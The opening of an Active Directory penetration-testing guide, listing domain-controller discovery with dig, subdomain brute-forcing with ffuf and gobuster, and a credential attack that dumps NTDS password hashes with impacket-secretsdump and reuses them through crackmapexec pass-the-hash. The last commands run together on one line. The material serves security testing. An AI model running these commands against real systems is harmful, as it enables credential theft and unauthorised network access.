Introduction
Microsoft’s Active Directory (AD) is the backbone of Windows domain networks. AD penetration testing is critical for discovering and mitigating security threats. In this book, we’ll look at several Active Directory penetration testing approaches, commands, and samples.
Enumeration
From Outside
Domain Controllers Discovery
To discover Domain Controllers using DNS:
dig @<target-ip> <domain-name> any
Subdomain enumeration with ffuf:
ffuf -u https://FUZZ.example.com -w subdomains.txt -mc 200,301,302,403
Using gobuster for DNS:
gobuster dns -d example.local -w subdomains.txt -t 25
Dumping Password Hashes
Use impacket-secretsdump to extract password hashes:
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL -outputfile hashes cut -d: -f3,4 hashes.ntds > hashes.txt crackmapexec smb <target-ip> -u <username> -H hashes.txt